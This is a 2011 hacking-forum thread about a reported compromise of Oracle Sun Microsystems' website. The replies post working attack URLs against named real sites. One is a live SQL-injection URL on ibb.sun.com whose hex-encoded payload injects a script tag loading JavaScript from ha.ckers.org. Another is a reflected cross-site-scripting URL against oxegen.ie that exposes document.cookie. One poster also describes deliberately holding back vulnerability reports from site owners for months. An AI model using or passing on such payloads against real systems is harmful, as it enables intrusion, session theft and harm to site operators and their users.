Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: TinKode
Date: March 27, 2011 05:34PM

Oracle Sun Microsystems [www.sun.com] vulnerable to SQL Injection. More here: [goo.gl] - TinKode

Options: ReplyQuote
Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: VMw4r3
Date: March 27, 2011 09:05PM

It's still live...

http://ibb.sun.com/apps/availlist/index.php?id=385+and+1=2+union+all+select+1,2,0x3C736372697074206C616E67756167653D4A617661536372697074207372633D687474703A2F2F68612E636B6572732E6F72672F733E3C2F7363726970743E,4,5,6,7,8,9,10,11,12,13--&subv=5&subc=3





Edited 1 time(s). Last edit at 03/27/2011 09:07PM by VMw4r3.

Options: ReplyQuote
Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: Skyphire
Date: April 01, 2011 10:53PM

OLD skool

Options: ReplyQuote
Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: skpx_
Date: April 08, 2011 01:09AM

hxxp://www.vs-db.info/?p=533

Found that reman.sun.com one last year =\ I guess they let it sit for this long.

Options: ReplyQuote
Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: VMw4r3
Date: April 08, 2011 02:34AM

@skpx_
I see that.. May 2nd, 2010 <-- nearly a year now......

I gave up on reporting vulnerabilities to admins on large sites, as they nearly always choose to ignore any vulnerabilities I point out.

Normally I wait a week or 2 before reporting, but with oxegen.ie I've been holding back for at least 5 month's now.

They are on wordpress, the index.php/search is vulnerable for some reason.

http://www.oxegen.ie/?s="><script>alert(document.cookie)</script>

Options: ReplyQuote


Sorry, only registered users may post in this forum.